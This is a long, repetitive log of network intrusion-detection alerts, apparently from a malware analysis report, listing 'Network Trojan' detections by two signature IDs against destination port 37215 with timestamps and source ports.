          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883815
          SID:2835222
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518183
          SID:2829579
          Source Port:36638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378415
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673099
          SID:2835222
          Source Port:51818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441001
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884536
          SID:2835222
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355092
          SID:2829579
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108010
          SID:2835222
          Source Port:47106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175739
          SID:2829579
          Source Port:48158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269318
          SID:2835222
          Source Port:56684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745972
          SID:2835222
          Source Port:57030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408221
          SID:2829579
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740162
          SID:2835222
          Source Port:49632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176275
          SID:2835222
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176931
          SID:2829579
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739615
          SID:2835222
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108803
          SID:2829579
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353010
          SID:2835222
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405403
          SID:2829579
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733477
          SID:2829579
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108706
          SID:2835222
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729187
          SID:2829579
          Source Port:46244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106140
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179381
          SID:2835222
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352245
          SID:2835222
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788392
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460747
          SID:2829579
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084949
          SID:2829579
          Source Port:39692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239042
          SID:2829579
          Source Port:56494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152831
          SID:2835222
          Source Port:57198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705133
          SID:2829579
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855111
          SID:2829579
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176439
          SID:2829579
          Source Port:34884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269274
          SID:2829579
          Source Port:34684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461486
          SID:2829579
          Source Port:48352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672544
          SID:2829579
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514074
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176258
          SID:2835222
          Source Port:53580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179005
          SID:2835222
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2835222
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604475
          SID:2835222
          Source Port:53498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859529
          SID:2835222
          Source Port:40146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737916
          SID:2835222
          Source Port:51332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106115
          SID:2829579
          Source Port:42530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512506
          SID:2829579
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789076
          SID:2829579
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184180
          SID:2829579
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555154
          SID:2835222
          Source Port:56852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466333
          SID:2835222
          Source Port:55724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153785
          SID:2829579
          Source Port:36030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176291
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055204
          SID:2829579
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600165
          SID:2835222
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110061
          SID:2829579
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306638
          SID:2835222
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351774
          SID:2829579
          Source Port:49790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014799
          SID:2835222
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241381
          SID:2829579
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741102
          SID:2829579
          Source Port:34040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406309
          SID:2835222
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038975
          SID:2829579
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110836
          SID:2835222
          Source Port:40640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548704
          SID:2835222
          Source Port:36668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146969
          SID:2829579
          Source Port:60446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792270
          SID:2829579
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106341
          SID:2835222
          Source Port:53752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116464
          SID:2835222
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172747
          SID:2829579
          Source Port:40074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467764
          SID:2829579
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815377
          SID:2829579
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783632
          SID:2835222
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020404
          SID:2835222
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706301
          SID:2835222
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601419
          SID:2835222
          Source Port:47636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268622
          SID:2829579
          Source Port:36140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460812
          SID:2829579
          Source Port:50238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272692
          SID:2829579
          Source Port:57880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462102
          SID:2829579
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306346
          SID:2835222
          Source Port:49982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884338
          SID:2835222
          Source Port:55934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792553
          SID:2835222
          Source Port:34862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789844
          SID:2829579
          Source Port:48388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747341
          SID:2835222
          Source Port:48688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668090
          SID:2829579
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.076784
          SID:2829579
          Source Port:34640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446771
          SID:2829579
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897572
          SID:2829579
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835661
          SID:2829579
          Source Port:51660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799253
          SID:2835222
          Source Port:51014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153573
          SID:2835222
          Source Port:34904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794104
          SID:2835222
          Source Port:57730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179082
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180503
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036567
          SID:2835222
          Source Port:50622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812844
          SID:2829579
          Source Port:33948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352542
          SID:2835222
          Source Port:60152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275650
          SID:2835222
          Source Port:44280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780333
          SID:2829579
          Source Port:34074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352956
          SID:2835222
          Source Port:34978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667017
          SID:2829579
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306330
          SID:2835222
          Source Port:52880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863165
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178860
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862338
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174790
          SID:2835222
          Source Port:57704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150266
          SID:2829579
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799034
          SID:2835222
          Source Port:55328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356669
          SID:2835222
          Source Port:32826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352457
          SID:2829579
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744580
          SID:2829579
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517703
          SID:2835222
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112218
          SID:2835222
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465054
          SID:2835222
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175946
          SID:2829579
          Source Port:39896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553081
          SID:2835222
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160471
          SID:2829579
          Source Port:48640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798889
          SID:2829579
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172940
          SID:2829579
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238111
          SID:2835222
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262331
          SID:2835222
          Source Port:42780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306441
          SID:2835222
          Source Port:45914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150327
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274208
          SID:2835222
          Source Port:38830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017200
          SID:2829579
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188664
          SID:2829579
          Source Port:49312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257779
          SID:2829579
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472081
          SID:2829579
          Source Port:37616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516638
          SID:2835222
          Source Port:33418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169348
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274620
          SID:2835222
          Source Port:44616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175607
          SID:2829579
          Source Port:54228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109909
          SID:2835222
          Source Port:53940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179961
          SID:2835222
          Source Port:44542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264654
          SID:2829579
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787174
          SID:2829579
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042770
          SID:2829579
          Source Port:41362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709962
          SID:2829579
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705447
          SID:2835222
          Source Port:40444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709445
          SID:2835222
          Source Port:54186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508847
          SID:2835222
          Source Port:55656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303106
          SID:2835222
          Source Port:41560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236500
          SID:2829579
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787898
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378267
          SID:2829579
          Source Port:57986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145247
          SID:2829579
          Source Port:54458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855392
          SID:2829579
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175795
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238499
          SID:2829579
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787616
          SID:2829579
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408855
          SID:2835222
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742310
          SID:2835222
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787769
          SID:2829579
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185686
          SID:2829579
          Source Port:46854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239058
          SID:2835222
          Source Port:54762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352574
          SID:2835222
          Source Port:50324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115400
          SID:2829579
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669712
          SID:2829579
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730884
          SID:2829579
          Source Port:57398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107980
          SID:2829579
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179052
          SID:2835222
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107357
          SID:2835222
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075100
          SID:2829579
          Source Port:58934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239788
          SID:2835222
          Source Port:60346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395391
          SID:2835222
          Source Port:51294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151302
          SID:2835222
          Source Port:34482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158879
          SID:2835222
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442404
          SID:2829579
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667196
          SID:2835222
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788585
          SID:2829579
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746504
          SID:2835222
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150251
          SID:2829579
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.842929
          SID:2829579
          Source Port:57296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604569
          SID:2835222
          Source Port:57050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704106
          SID:2829579
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274397
          SID:2835222
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601259
          SID:2835222
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894501
          SID:2835222
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158586
          SID:2835222
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015771
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135880
          SID:2829579
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897445
          SID:2829579
          Source Port:38454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594949
          SID:2835222
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113298
          SID:2835222
          Source Port:46682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152773
          SID:2829579
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162551
          SID:2835222
          Source Port:60516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745932
          SID:2835222
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174596
          SID:2829579
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107297
          SID:2835222
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795359
          SID:2829579
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108255
          SID:2829579
          Source Port:46216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670030
          SID:2835222
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709398
          SID:2829579
          Source Port:46336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467806
          SID:2835222
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842371
          SID:2835222
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242357
          SID:2835222
          Source Port:52134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893294
          SID:2835222
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159612
          SID:2835222
          Source Port:50630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
